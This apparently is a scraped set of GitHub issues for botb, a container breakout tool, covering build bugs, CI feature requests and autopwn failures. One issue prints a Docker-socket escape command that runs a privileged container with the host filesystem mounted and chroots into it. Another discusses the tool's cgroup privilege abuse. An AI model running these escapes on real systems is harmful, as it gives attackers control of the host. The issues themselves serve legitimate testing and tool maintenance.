brompwnie / botb Goto Github PK

Hi Chris hope you're well,

Just as a quick heads up there's a botnet deploying Botb, thought you might be interested to take a look -- > https://pastebin.com/5QMub0Xs

Thanks,

It would be beneficial to add a flag to the application that allows it to always exit with a code 0 even if there are issues found. This would allow people to integrate the tool into their CI/CD pipelines and fix issues without blocking developers from deploying changes.

The rev-dns function contains an overflow for 32bit builds due to the constant 4278190080.
This can be reproduced by running the provided makefile

make
>> removing previous builds
>> running check for unused/missing packages in go.mod
>> building Linux 64bit binary
GOOS=linux GOARCH=amd64 go build -o /github.com/brompwnie/botb/bin/botb-linux-amd64 ./
>> running check for unused/missing packages in go.mod
>> building darwin 64bit binary
GOOS=darwin GOARCH=amd64 go build -o /github.com/brompwnie/botb/bin/botb-darwin-amd64 ./
>> running check for unused/missing packages in go.mod
>> building linux 32bit binary
GOOS=linux GOARCH=386 go build -o /github.com/brompwnie/botb/bin/botb-linux-386 ./
# github.com/brompwnie/botb
./utils.go:1079:37: constant 4278190080 overflows int
make: *** [build-linux32] Error 2

Hi

Firstly thanks for this, an excellent idea. I was wondering how i can include this in my pipeline. I am already using trivy to scan the container for CVE's and this runs against the image ive built in the pipeline.

Is it possible to run bob against a docker image rather than running the container and downloading bob into it to run it that way (i am assuming this is the expected way to run it at the moment)

Thanks again

In utils.go:66 the mount of the cpu cgroup controller is being executed.

botb fails, if the mount fails (which is the case, when the cgroup is already mounted).

After removing the error check / cgroup mount, the privileged pwn works again.

The abuseCgroupPriv function should check if the mount already exists before. I'll try to build a patch for that.

I was just testing out rootless docker, so obviously trying botb -autopwn.

At the moment it's failing as --pid=host and --ipc=host don't work with rootless.

docker run -it -v /run/user/1000/docker.sock:/var/run/docker.sock raesene/alpine-containertools /bin/bash

bash-5.0# botb -autopwn
[+] Break Out The Box
[+] Attempting to autopwn
[+] Hunting Docker Socks
[+] Attempting to autopwn:  /run/docker.sock
[+] Attempting to escape to host...
[+] Attempting in TTY Mode
./docker/docker -H unix:///run/docker.sock run -ti --privileged --net=host --pid=host --ipc=host -v /:/host alpine:latest /bin/sh
chroot /host && clear
echo 'You are now on the underlying host'
./docker/docker: Error response from daemon: OCI runtime create failed: container_linux.go:370: starting container process caused: process_linux.go:459: container init caused: rootfs_linux.go:59: mounting "proc" to rootfs at "/proc" caused: operation not permitted: unknown.
[*] Successfully exited TTY
[+] Finished

A fix for this would probably be to detect the container is running in a user namespace, and then change the autopwn command to drop those two bits off.

Feature request from @singe. This is currently in another branch that needs to be merged.

README.md needs a clean up, related to this PR #6.